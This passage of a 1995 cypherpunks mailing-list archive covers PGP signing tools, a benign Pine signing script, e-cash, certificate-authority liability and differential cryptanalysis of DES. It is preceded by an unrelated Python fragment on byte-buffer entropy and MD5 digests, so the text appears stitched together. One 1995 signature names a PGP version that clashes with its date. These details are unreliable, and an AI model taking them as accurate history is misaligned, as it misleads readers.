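    rng = random.Random(seed)  # fixed seed so the demo is repeatable
    out = bytearray()
    value = 0x80
    for _ in range(n_runs):
        out.extend(bytes([value]) * rng.randint(LO, HI))
        value = 0x7F if value == 0x80 else 0x80
    return bytes(out)


def order0_bits_per_byte(buf):
    """Frequency-only estimate: treats each byte as independent of its
    neighbours, so two equally common values score about 1 bit per byte."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def order1_bits_per_byte(buf):
    """H(X_i | X_{i-1}): entropy of a byte given the previous byte. Long runs
    make the next byte almost certain, so this is far lower than order 0."""
    pairs = Counter(zip(buf, buf[1:]))
    prev = Counter(buf[:-1])
    n = len(buf) - 1
    return -sum(c / n * math.log2(c / prev[a]) for (a, _b), c in pairs.items())


def digest_entropy_bound(n_runs):
    """Upper bound, in bits, on the unpredictability of an MD5 digest of a
    buffer whose only freedom is n_runs run lengths in LO..HI. Hashing
    spreads the entropy over 128 bits; it cannot create any."""
    return min(128.0, n_runs * math.log2(HI - LO + 1))


def distinct_md5_digests(n_runs):
    """Hash every buffer the model can produce and count distinct digests.
    Only practical for small n_runs; it makes the bound above concrete."""
    digests = set()
    for lengths in itertools.product(range(LO, HI + 1), repeat=n_runs):
        buf = b"".join(
            bytes([0x80 if i % 2 == 0 else 0x7F]) * n
            for i, n in enumerate(lengths)
        )
        digests.add(hashlib.md5(buf).digest())
    return len(digests)


if __name__ == "__main__":
    buf = make_idle_buffer(200)
    print("bytes sampled:          ", len(buf))
    print("order-0 bits per byte:  ", round(order0_bits_per_byte(buf), 3))
    print("order-1 bits per byte:  ", round(order1_bits_per_byte(buf), 3))
    print("bound for 10 runs, bits:", round(digest_entropy_bound(10), 1))
    print("digests from 2 runs:    ", distinct_md5_digests(2))
```

The digests look uniformly distributed, but a buffer of two runs can only ever hash to 441 different values, so any per-byte figure has to come from a model of the runs, not from byte frequencies.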




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Tardieu <sam@inf.enst.fr>
Date: Wed, 23 Aug 95 02:47:19 PDT
To: wilcoxb@nagina.cs.colorado.edu
Subject: Re: True Names and Webs of Trust
In-Reply-To: <199508222317.TAA09558@eiffel.lcs.mit.edu>
Message-ID: <"8TnD63.0.a82.oVlEm"@gargantua>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Bryce" == Bryce Wilcox <wilcoxb@nagina.cs.colorado.edu> writes:
(in a PGP signed message)

[...]
Bryce> You are quite right that this paragraph was unclear. 
[...]

Bad signature, doesn't match file content :))) Bryce, why don't you
really PGP-sign a mail when you agree you were unclear ? :)))

  Sam
- --
"La cervelle des petits enfants, ca doit avoir comme un petit gout de noisette"
                                                       Charles Baudelaire

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAgUBMDr36IFdzKExeYBpAQH60gP/ZlbC6alikSBjCsWxf/g2mjDVRNvlcu3P
Y1ljl7t1mnkfOag0uGaZVAHzDkcLfq5VrwNPVBpZUJmm0hHcUxyyP63rX42EC0n5
ATA3fnmxsmPrMZsAHYjfzI/kPeCX0xO0Fn8XIAv55BzGPzm8w8hp31x4FwEWn7+O
Ip9R7jWTQ1o=
=skv6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 23 Aug 95 09:54:33 PDT
To: dan@milliways.org (Dan Bailey)
Subject: Re: DES & RC4-48 Challenges
Message-ID: <9508231653.AA01631@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Dan Bailey writes:
>  According to Biham and Shamir's Differential Cryptanalysis of DES,
>  "An interesting feature of the new attack is that it can be applied
>  with the same complexity and success probability even if the key
>  is frequently changed and thus the collected ciphertexts are derived
>  from many different keys.  The attack can be carried out
>  incrementally, and one of the keys can be computed in real time
>  while it is still valid.  This is particularly important in attacks
>  on bank authentication schemes, in which the opponent needs only
>  one opportunity to forge a multi-million dollar wire transfer, but
>  has to act quickly before the next key changeover invalidates his
>  message.  This is the first published attack which is capable of
>  breaking the full DES in less than the complexity of the exhaustive
>  search of 2^55 keys." (7-8)
>  	The problem with this attack, of course, is generation and
>  analysis of all the required chosen plaintexts.

If I read this correctly, then the keys used for generation of the chosen
plaintext-cyphertext pairs are irrelevant and once the required computation is
done, one can crack any '...one of the keys can be computed in real time while
it is still valid.'..

So what, exactly, does this mean?  Can I do most, if not all of the feeding of
chosen plaintext into my personal DES box in my basement, do the required
computation (admittedly there is a lot of work to do here), then go out and
start breaking wire-transfers with a minimum of chosen plaintext?  That is
what the above quotation would seem to imply.

Seems incredible...  I surely must be reading much more into the passage than  
is really there...

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 23 Aug 95 08:59:31 PDT
To: perry@piermont.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <v02120d01ac60f9d955ba@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 8/23/95, Perry E. Metzger wrote:

>Actually, what you've just described is general commercial paper, not
>just a bond. Anything that lists a sum certain in money to be paid on
>a date certain (with various other parameters, too, like a place) is
>negotiable commercial paper. Checks, notes, and other instruments are
>all commercial paper. They are not, by the way, certificates in the
>sense that I suspect you mean.

I really don't know. If a digital personal debt certificate isn't a bond,
but is a subset of commercial paper, we may be quibbling about definitions,
like Tim was saying.

So, let's look at this for a second. First, a check is a kind of
certificate pointing to a book entry in a bank somewhere, payable upon
demand. A note or commercial paper is a promise to pay money plus interest,
cash included, at a certain time in the future. So's a bond, but the
duration is longer. It's easy to see how they're all certificates, though
they can be held at a clearinghouse and thus be book-entries. Clear as
mud, I guess... I'll try better next time when I've gotten more running
room.

We agree that it's a fixed income instrument of some kind, right?
Certainly it's not completely anonymous, but your pseudonymous key can
borrow money if its reputation is clean enough.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Wed, 23 Aug 95 09:04:54 PDT
To: "Sameer R. Manek" <seawolf@challenger.atc.fhda.edu>
Subject: PGP for pine/PINESIGN 2.0
In-Reply-To: <Pine.SGI.3.90.950822231652.1318B-100000@challenger.atc.fhda.edu>
Message-ID: <Pine.SOL.3.91.950823114854.14341A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Aug 1995, Sameer R. Manek wrote:

> Does anyone know of an addon to the Pine mailer that supports PGP? 
> the only PGP software I could find required me to first compose a
> letter in an editor then run it through a pgp signature program
> then finally read it into my favorite mailer.
> 
> I'm looking for something that is hopefully transparent, or if not
> relatively quick to do.
> 
> 

R.A. Hayden has posted this to the list before.  I also recall Raph Levien's
premail, but I don't know if it works for PINE; any satisfied customers
out there?  I admit I haven't tried either of these myself, though I
would be interested in the results of a  *Cypherpunks sign with PINE*
comparison of the various solutions for PGP integration into PINE.  I might
even be persuaded to begin signing my posts to the list.  :-)


C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





After a couple of comments, I've updated Pinesign to a new version.  This 
new version adds the ability to choose whether your ASCII signature (i.e.,
$HOME/.signature) is added.  Some mail servers get confused by extra 
text, so the ability to make sure nothing extra is added was requested.

Basically, if you want to sign the message both digitally and asciilly 
(is that a word :-), just press return twice after you exit your composing 
editor.  Otherwise, make the selections you want specific to the type of 
message you are sending.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#!/bin/sh

# PINESIGN v2.0
# Written by:  Robert A. Hayden <hayden@krypton.mankato.msus.edu>

# PINESIGN is a simple program that will allow you to automatically sign 
# your email and news messages composed with the Pine 3.89 mail reader.  It 
# may also work with other mail and news programs, but it has not been 
# tested.

# INSTRUCTIONS FOR CONFIGURING PINE
# 
# You need to define the following options in Pine.  This can be done 
# either via the SETUP options in the main menu of Pine, or via editing 
# the .pinerc. 
#
# 	A)	signature-file=" "  (an empty space)
#	B)	enable-alternate-editor-cmd
#	C)	enable-alternate-editor-implicitly (optional but recommended)
#	D) 	signature-at-bottom
#	E)	editor=<exact path to this script>

# INSTRUCTIONS FOR CONFIGURING PINESIGN
#
# The PGP program must be in your path, and the PGPPATH environment 
# variable must be defined.  See the PGP documentation for details.
#
# Double check that the first line of this program points to sh. 
#
# Edit the SIGPATH and PINEEDITOR variables to point at your signature 
# (if any) and the editor you wish to use for your Pine mail.  Default 
# signature will be the file .signature in your $HOME directory.  
# Default editor is pico -z -t.

SIGPATH=$HOME/.signature-pine
PINEEDITOR='pico -z -t'

# INSTRUCTIONS FOR USING PINESIGN
#
# When you compose a message, you will compose your message as normal.  
#
# When you exit your editor (control-X in Pico), you will receive a prompt 
# asking if you wish to add your signature file to the message.  If you 
# respond with y, Y or just press return, your text signature file (often 
# $HOME/.signature) will be appended to your message.  If you type  
# anything else, your message will not have your signature added.
#
# Next, you will be prompted as to whether you wish to PGP sign your
# message.  If you answer with y, Y or return, you will be prompted for your
# PGP passphrase and then dumped back to the address/subject section of
# Pine.  If you type anything else, your message will not be signed.  
#
# If you selected it to be added, your .signature file will be appended 
# AFTER your digital signature. 
#
# If you have not defined your alternate editor to be run implicitly, you 
# will need to start it manually.  If you do not run the alternate editor,
# your .signature file will not be appended and you will also have to do
# that manually.  It is highly recommended that you define your alternate
# editor to run implicitly. 

### DO NOT EDIT ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING ###

# Run the real editor on the message file Pine passes in.  PINEEDITOR is
# left unquoted on purpose so that its options are split into arguments.
$PINEEDITOR "$1"

clear
printf "Would you like to add your ASCII signature to this message? [y] "
read SIG
echo " "
printf "Would you like to sign this message with your PGP signature? [y] "
read PGP

# y, Y or a bare return all mean yes.
case "$PGP" in
	y|Y|"")
		# Replace the message with the signed copy only if PGP succeeded.
		pgp -sat +comment="PGP Signed with PineSign 2.0" "$1" &&
			mv "$1.asc" "$1"
		;;
esac

# The text signature is appended AFTER the digital signature.
case "$SIG" in
	y|Y|"")
		echo " " >> "$1"
		cat "$SIGPATH" >> "$1"
		;;
esac




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 11:36:51 PDT
To: cypherpunks@toad.com
Subject: Aptical foddering
Message-ID: <ac60c34434021004b79b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:31 PM 8/23/95, Robert Hettinga wrote:

>Tim, just what does "aptical" mean? ;-).
>

As in "aptical foddering."

I put this as my occupation on my draft registration form (Selective
Service, aka "the draft") in 1969, from memories of a science fiction
story. The canonical nonsense term, but vaguely plausible.

I have used it often in the past 26 years.

Someone about a year ago (sorry, forgot whom) sent me a note saying he
recognized this from a Keith Laumer short story, something along the lines
of "Graduating Class" or somesuch. (Not this title, but something with a
school or class theme.)

Relevance to crypto? If you have to ask what aptical foddering has to do
with crypto....!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 23 Aug 95 09:13:21 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: e$: The Book-Entry/Certificate Distinction
In-Reply-To: <v02120d01ac60f9d955ba@[199.0.65.105]>
Message-ID: <199508231613.MAA10539@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga writes:
> So, let's look at this for a second. First, a check is a kind of
> certificate pointing to a book entry in a bank somewhere, payable upon
> demand.

Actually, it isn't. It's an instruction to the bank to pay to someone's
order. Note that the existence of a check doesn't guarantee that there
are funds in the bank that can pay. The check isn't a certificate of
the existence of funds -- only of the existence of an order by the
account holder.

> A note or commercial paper is a promise to pay money plus interest,
> cash included, at a certain time in the future. So's a bond, but the
> duration is longer. It's easy to see how they're all certificates, though
> they can be held at a clearinghouse and thus be book-entries.

Well, the point that I'm trying to make is that a bond certificate is,
provided you don't think it's a forgery, an actual bond. It isn't,
however, the actual underlying money, because the issuer can
default. If someone is trying to buy a bond the bond certificate in
some sense allows you to clear the transfer, but it clears the
transfer of the bond, not the payment of the obligation. I'm probably
being a bit obtuse here, but I suspect my point is made...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Date: Wed, 23 Aug 95 09:35:56 PDT
To: cypherpunks@toad.com
Subject: The End of the Ecash Trial?
Message-ID: <199508231635.MAA07961@mummy.cis.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


I have yet to see a date, but Digicash states several times in their
press releases that Cyberbucks are only a trial currency, and that at
some point in the future the trial will come to an end.

Will the bottom drop out of the c$ market at that point? Without
Digicash to authenticate currency, it would appear to be impossible to
trade c$ coins. If and when Digicash announces an end date for the
trial, I would expect to see quite a spectacular crash in the "real
cash for ecash" market.

The only way to preserve the market would appear to be providing an
ecash-for-ecash exchange with a new bank, presumably a licensee of the
Digicash software. Such a bank could, out of little more than good
will and a desire to kick-start a new e-currency, offer to exchange c$
for the new ecash. Or, perhaps we just shrug our shoulders, kiss our
hardly-earned Cyberbuck goodbye, and mumble about how it was fun while
it lasted.

Either way, in order to preserve the new e-currency's value -- and
correct my economics where flawed -- we need the assurance that the
money supply will not experience unreasonable growth. The ecash trial
has Digicash's promise of a c$1M cap; is this trust sufficient
leverage for the user to leave any amount of value in the Cyberbuck,
or its successor?

nathan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Wed, 23 Aug 95 13:06:59 PDT
To: cypherpunks@toad.com
Subject: Pointer to InfoWeek article: "Internet Thieves"
Message-ID: <9508232006.AA02989@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain



The current online issue of InformationWeek contains an article about
new threats to data security.  Nothing in the article should be new to
most Cypherpunks readers, but those who are interested can find the
article at: 

    http://techweb.cmp.com/iw/current/42mtweb.htm

To its credit, IW has no obnoxious registration procedure; just click
and read.  Here's a sample:

===============================================================================
INTERNET THIEVES

Trade in black-market data is a growing problem for business.  What, if
anything, can be done?

By Clinton Wilder and Bob Violino (Issue date: August 28, 1995)

The new frontier of cyberspace represents vast opportunities for
innovation, entrepreneurship, and profit-making. But there is also a
dark side to the online world, one that poses a worrisome threat to the
security of corporations.  The Internet has spawned an illegal market
in which thieves use the latest Net software tools to trade stolen
information, including corporate trade secrets.
[...]
===============================================================================


--
Martin Janzen           janzen@idacom.hp.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ferreira, Ben  296-4158" <BFERREIR@pchardy.petro-canada.ca>
Date: Wed, 23 Aug 95 12:15:03 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: PGP for elm
Message-ID: <303B8EF5@smtpgw.pccw.petro-canada.ca>
MIME-Version: 1.0
Content-Type: text/plain




Anyone know if there is a PGP interface or elm version that supports PGP?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Wed, 23 Aug 95 09:17:45 PDT
To: solman@mit.edu
Subject: Re: DES & RC4-48 Challenges
Message-ID: <199508231617.AA25787@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 22 Aug 1995 00:43:20 EDT you wrote:

>The forms of differential cryptanalysis that I'm aware of require the
>cracker to adaptively attack the encrypting or decrypting device. I
>therefore do not believe that they are especially applicable to
>financial transactions schemes, most of which change keys quite
>frequently.
>
>JWS

According to Biham and Shamir's Differential Cryptanalysis of DES, "An
interesting feature of the new attack is that it can be applied with
the same complexity and success probability even if the key is
frequently changed and thus the collected ciphertexts are derived from
many different keys.  The attack can be carried out incrementally, and
one of the keys can be computed in real time while it is still valid. 
This is particularly important in attacks on bank authentication
schemes, in which the opponent needs only one opportunity to forge a
multi-million dollar wire transfer, but has to act quickly before the
next key changeover invalidates his message.  This is the first
published attack which is capable of breaking the full DES in less
than the complexity of the exhaustive search of 2^55 keys." (7-8)
	The problem with this attack, of course, is generation and analysis
of all the required chosen plaintexts.  The analysis phase eats up
2^37 time looking at 2^36 ciphertexts from a universal set of 2^47
chosen plaintexts.  Brute-forcing SSL has a worst-case time complexity
on the order of 2^40.  It appears that complexity for breaking
16-round DES is on the order of 2^37, according to Biham and Shamir.
(87)
	Is there any published source code available for this type of attack?
 The book itself doesn't contain any code, just lots of proofs.  Since
2^40 > 2^37, I think a group effort would be capable of mounting this
attack.
						Dan

******************************************************************************
"I think, therefore I am" - Descartes                            Dan Bailey
"I don't think, therefore I'm a moustache." - Sartre		    dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 23 Aug 95 11:20:04 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: A glance at the future of missing child identification
In-Reply-To: <199508210136.VAA09171@bb.hks.net>
Message-ID: <9508231819.AA19515@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes
>BTW, is there a futures market that allows you to bet real money?

If you mean something like Idea Futures, but with real money, I haven't
seen one.  I *have* seen "Iowa Electronic Markets", run by U Iowa, which
has real-money futures on certain political campaigns (Presidential,
Republican Convention, and Powell Nomination).

See <URL:http://www.biz.uiowa.edu/iem/index.html>.

I e-mailed the person responsible asking about the legalities of doing
such a thing, as true gambling on presidential elections isn't legal.
She indicated that they had a letter from the appropriate governmental
agency which promised to take no action as long as they adhered to
certain limits (a maximum on purchases being the most significant).

Apparently they've already had requests to make some fairly *large*
($500,000 or more) investments.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Wed, 23 Aug 95 11:28:52 PDT
To: cypherpunks@toad.com
Subject: Government Accountability through Cryptography
Message-ID: <199508231828.NAA02667@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Recently, there have been many scandals (Ruby Ridge, Whitewater, the death of
Vince Foster, Waco) involving the government.  Even if the government is
completely innocent, the perception of corruption is damaging.  A big part of
the problem comes from claims that incriminating documents have been hidden,
destroyed, or altered.  I believe I have a solution.  If the government would
just encrypt (using 64 bit keys or less) all their internal documents and
publish them electronically, they could be checked when questions arise.  The
key should be held in escrow by a private company to be released only by court
order, executive order, or act of Congress.  Since this is very similar to
the administration's proposal on cryptography, I'm sure they won't object.
Perhaps we should lobby Congress.


Frank Stuart              | (Admiral Grace) Hopper's Law:
fstuart@vetmed.auburn.edu | It's easier to get forgiveness than permission. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 23 Aug 95 10:31:55 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <v02120d01ac610fa3b88c@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:06 PM 8/23/95, Timothy C. May wrote:

>Whoah, there!
>
>I wasn't saying we were "quibbling" about definitions, I was saying that
>different people have different names for things and different
>interpretations, and that it behooves us to figure out what the real
>definitions are, the standard names, and not invent new names when existing
>names will do.

Agreed. My apologies for characterizing it as "quibbling". Chain-gun
Hettinga here, type first, and let God sort 'em out. A meta-reference to
the problem I was talking about, I suppose. And, given what Perry said
later, it's not so much a fight over definitions as I thought.

>And that one benefit of class libraries for the "things" of commerce,
>finance, crypto, etc., may be make it clearer what is being described.

Amen.

Tim, just what does "aptical" mean? ;-).

Cheers,
Bob

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 23 Aug 95 10:32:12 PDT
To: Nathan Loofbourrow <cypherpunks@toad.com
Subject: Re: The End of the Ecash Trial?
Message-ID: <v02120d04ac6112134b53@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:35 PM 8/23/95, Nathan Loofbourrow wrote:
>I have yet to see a date, but Digicash states several times in their
>press releases that Cyberbucks are only a trial currency, and that at
>some point in the future the trial will come to an end.

We've talked about this a little bit on ecm.

Someone from Digicash is on record there as saying that trading in c$ came
as a complete surprise.

The hitch about continuing to honor c$ is that there needs to be a bank.
Someone correct me if I'm wrong, but it seems that the current system does
work on an offline, peer-to-peer basis.  Nonetheless, occasionally, you
still need to verify that the money hasn't been double spent, and for that
you need a bank.

The problem with being a bank is the price of the bank software, which is
where David Chaum and Co. want to make their money.  Thus, the last price I
got (offhand) from David on the phone a year ago was $250k + 10% of net
profits.  Given the cost of hardware, people, lawyers, and if you actually
back the certificates with dollars in a bank of deposit (not being what we
want to do here, admittedly) bankers, and more lawyers.  Could add up to a
multimillion dollar proposition.

Of course, it could be done with donated professional time, bandwidth,
hardware and donated bank software from Digicash. But it's hard to see that
happening from here...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Wed, 23 Aug 95 13:35:03 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: is there...
In-Reply-To: <199508231956.PAA10953@frankenstein.piermont.com>
Message-ID: <Pine.3.89.9508231334.A608-0100000@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


There is a link to the list from my home page. I don't remember the URL
for the list, but my page is http://obscura.com/~loki/Welcome.html

	-Lance

On Wed, 23 Aug 1995, Perry E. Metzger wrote:

> 
> Is there an online version of Raph's anonymous remailer list for FTP
> or on the web? I suddenly need to give it to someone.
> 
> .pm
> 

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 22 Aug 95 20:35:07 PDT
To: cypherpunks@toad.com
Subject: Re: Export policy change
In-Reply-To: <9508182218.AA04527@ch1d157nwk>
Message-ID: <Pine.SUN.3.91.950823133224.647N-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Heck, you Americans need to store your keys in a foreign country; I have 
a floppy-based CP/M box that looks ideal for the job (I have LOTS of 
those 5-1/4" DSDD floppies).

Did I mention that my drives are a bit unreliable?  And my son likes to 
pull floppies apart?

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2DAA.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | D8 15 71 F9 26 C8 63 40  5E 63 5C 65 FC A0 22 99





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 23 Aug 95 11:11:12 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Personal: Flub
In-Reply-To: <ac60acd12d0210047191@[205.199.118.202]>
Message-ID: <199508231810.OAA03332@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> >Henry,
> >
> >I just saw your name and wondered if you're any relation to Dan Farkas, a
> >mathematician (last I heard) who attended the same university I did in the
> >late 1960s.
> 
> Sorry about this!
> 
> I hit the "Cancel" button as soon as the transfer started, and had hoped
> I'd caught it before it went out to the list.

  You should have pressed the escape key. ;-)


____
 ||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@ims.advantis.com>
Date: Wed, 23 Aug 95 11:31:26 PDT
To: cypherpunks@toad.com
Subject: Re: Personal: Flub
In-Reply-To: <199508231810.OAA03332@clark.net>
Message-ID: <Pine.3.85.9508231403.B50593-0100000@pangloss.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 1995, Ray Cromwell wrote:

> > I hit the "Cancel" button as soon as the transfer started, and had hoped
> > I'd caught it before it went out to the list.
> 
>   You should have pressed the escape key. ;-)

186,000 miles per second.  It's not just a good idea, it's the law.

(I tried to resist, folks, really I did, but Ray had to go and make his 
[escape] joke, so it's actually his fault. ;-)

===========================================================================
     Henry W. Farkas      |      Me?    Speak for IBM?    Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://newstand.ims.advantis.com/henry
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
---------------------------------------------------------------------------
Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not
  fast, but it's not bad, and we're cheaper than the guy down the street!"
===========================================================================








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Wed, 23 Aug 95 11:39:19 PDT
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <9508231839.AA15687@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


[ Oops -- this was supposed to go to the list too. ]

Michael Froomkin writes:

[ Note: I've rearranged a couple of paragraphs ]

> On Mon, 21 Aug 1995, Bill Stewart wrote:
> 
> > can be substantial even if the suit is bogus.)  Under what conditions do
> > you expect somebody to sue a CA?
> 
> CA certifies key saying that holder has corporate power to enter into 
> deals up to $1million.  Keyholder commits fraud, arguably outside 
> corporate powers.

> CA certifies that a document is authentic and time-stamps it.  Lawyers 
> did not do due diligence, books were cooked, everyone who touches 
> document gets sued.

This seems to be confusing different entities.  The roles in these
examples aren't the CA's role.  In the usual crypto lingo, the CA
only certifies that a key belongs to a certain individual.  Some
entity within the corporation is responsible for saying whether an
individual can do deals up to $1 million.  Some other organization
provides time-stamps (though it's possible that a CA could be dragged
into your second example).  But let's keep the terminology straight:
a CA as used in crypto literature means the agent who certifies that
"this key belongs to X" (for some definition of X).


> CA certifies you are Jack Ripper based on phony id.  In fact you are Sam 
> Spade.  CA sued for recovery of ensuing fraud.
> 
> In each of these cases, if the CA did exactly what it promises and no 
> more, it (arguably) deserves a way to short-circuit the suit, thus 
> keeping its costs down.

This is a better example to start from.  I agree with your sentiment
but don't necessarily agree with the conclusion.  Let's start from
the important "if" in your sentence.  If the CA publicly guarantees
only that it checks for a certain ID and can prove it did this
(perhaps by producing a picture or photocopy of the ID it examined),
it shouldn't have too much trouble defending the case.  No reason why
it should need any special short-circuit.  Eventually, successful
defenses will show that it's a waste of time to attack the CA if
the CA did what it promised.

If it guarantees more (say, that "this key *really* belongs to 'X'"),
then it better be prepared to establish that fact to its own
satisfaction before issuing the certificate (via birth certificates,
passports, fingerprints, retinal scans or all of the above).  If it
fails to do those things, then it is and should be liable.  After
all, that's what the CA is getting paid for: to keep the promise
it's implicitly making and take the heat to back up its promise.


> Since (in the absence of any rules given the newness of the technology) it
> is very likely that a rich CA would get nuisance suits every time a deal
> in which it participated went sour, the absence of rules will either 
> raise costs CAs have to charge (e.g. to buy insurance) or will keep rich 
> folk out of the industry (which isn't good either, since you want CAs to 
> buy security and to last).  Thus the need for clear liability rules.

I think this is just part of the landscape for a CA.  Again, that's
what they're getting paid for.  As for the rules, the courts will work
those out through litigation.  How else?  :-)

BTW, VeriSign is acting as a CA now for Netscape Commerce Server and
Open Market Secure Web Server certificates, and perhaps others -- see:
http://www.verisign.com/

I don't know exactly what guarantee VeriSign's making or what they
expect their liability to be, but they are making a reasonable effort
to establish the identity of server certificate holders (copy of letters
of incorporation, business licenses and so forth).  And they are charging
$290 for a first-year certificate.  It seems to me this $290 (though 
not huge for a business) is a lot more than it costs them just to
check the papers and execute the mechanics of creating the certificate.
The rest is their compensation for taking the "risk" of issuing the
certificate's implicit guarantee.  Presumably, some of that money goes
toward insuring themselves against the kinds of claims you cited above.

Just my thoughts -- IANAL.


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
